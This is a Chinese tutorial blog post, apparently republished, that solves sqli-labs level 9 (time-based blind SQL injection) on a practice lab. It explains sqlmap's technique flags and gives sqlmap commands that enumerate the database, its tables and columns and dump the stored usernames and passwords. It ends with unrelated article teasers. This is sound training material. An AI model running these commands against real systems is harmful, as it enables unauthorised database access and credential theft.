web——sqliabs靶场——第九关——时间盲注

ops/2024/11/24 8:01:18/

什么是时间盲注

时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。

使用sqlmap不同的技术

sqlmap --technique 参数用来设置具体SQL注入技术
B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U:Union query-based Union查询注入

S:Stacked queries 堆叠注入

T:Time-based blind 基于时间的盲注

Q:lnline queries 内联查询注入

例如:

sqlmap -u “存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。
原文链接:https://blog.csdn.net/qq_49091880/article/details/122301562

使用时间盲注的脚本

1.爆数据库

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T --current-db --batch

batch是强制执行所有选择Y

2.爆破表名

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security --tables --batch

 

3.爆破列名

时间太慢了,sqlmap可以调整回显时间,

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users --columns --time-sec=1 --batch

 --time-sec=1:回显时间为1

4. 爆破列里的数据

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C password --dump --time-sec=1 --batch
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C username --dump --time-sec=1 --batch

时间盲注缺点:用时比较长。


http://www.ppmy.cn/ops/136261.html

相关文章

微信小程序数据绑定与事件绑定详解:从入门到精通

微信小程序数据绑定与事件绑定详解:从入门到精通 引言 在微信小程序的开发中,数据绑定和事件绑定是构建用户界面的核心概念。它们不仅可以让开发者更高效地管理数据,还能提升用户交互体验。本文将从基础知识入手,逐步深入,讲解数据绑定、事件绑定、事件传参及数据同步的…

RPC学习

一、什么是 RPC RPC(Remote Procedure Call),即远程过程调用,是一种计算机通信协议,它允许运行在一台计算机上的程序调用另一台计算机上的子程序或函数,就好像调用本地程序中的函数一样,无需程序…

探索PDFMiner:Python中的PDF解析利器

文章目录 **探索PDFMiner:Python中的PDF解析利器**1. 背景介绍:为何选择PDFMiner?2. PDFMiner是什么?3. 如何安装PDFMiner?4. 简单库函数使用方法4.1 提取文本4.2 获取页面布局信息4.3 提取表格数据4.4 提取图像 5. 应…

css效果

css炫彩流光圆环效果 <!DOCTYPE html> <html><head><meta charset"utf-8" /><title></title><style>*{margin: 0;padding: 0;}body{width: 100%;height: 100vh;}.container{position: relative;width: 100%;height: 100vh…

【微软:多模态基础模型】(5)多模态大模型:通过LLM训练

欢迎关注[【youcans的AGI学习笔记】](https://blog.csdn.net/youcans/category_12244543.html&#xff09;原创作品 【微软&#xff1a;多模态基础模型】&#xff08;1&#xff09;从专家到通用助手 【微软&#xff1a;多模态基础模型】&#xff08;2&#xff09;视觉理解 【微…

Gate学习(5) 指令学习2

一、gate目录下指令 ls /gate 以下是gate中各个目录下的指令及其使用示例和说明: /gate/actor/ ### /gate/actor/addActor - **命令**:`/gate/actor/addActor` - **说明**:这个命令用于在Gate中添加一个新的传感器,也就是我们通常所说的“演员”(Actor)。通过这个命令…

从搭建uni-app+vue3工程开始

技术栈 uni-app、vue3、typescript、vite、sass、uview-plus、pinia 一、项目搭建 1、创建以 typescript 开发的工程 npx degit dcloudio/uni-preset-vue#vite-ts my-vue3-project2、安装sass npm install -D sass// 安装sass-loader&#xff0c;注意需要版本10&#xff0c;…

气膜网球馆:网球热潮中的全新选择—轻空间

郑钦文在2024巴黎奥运会网球女单比赛中夺冠&#xff0c;不仅实现了中国选手在这一项目上的历史性突破&#xff0c;更激发了广大群众参与网球运动的热情。从专业赛事到全民运动&#xff0c;网球热度空前高涨。气膜网球馆顺势而为&#xff0c;为网球爱好者提供了一个专业、安全、…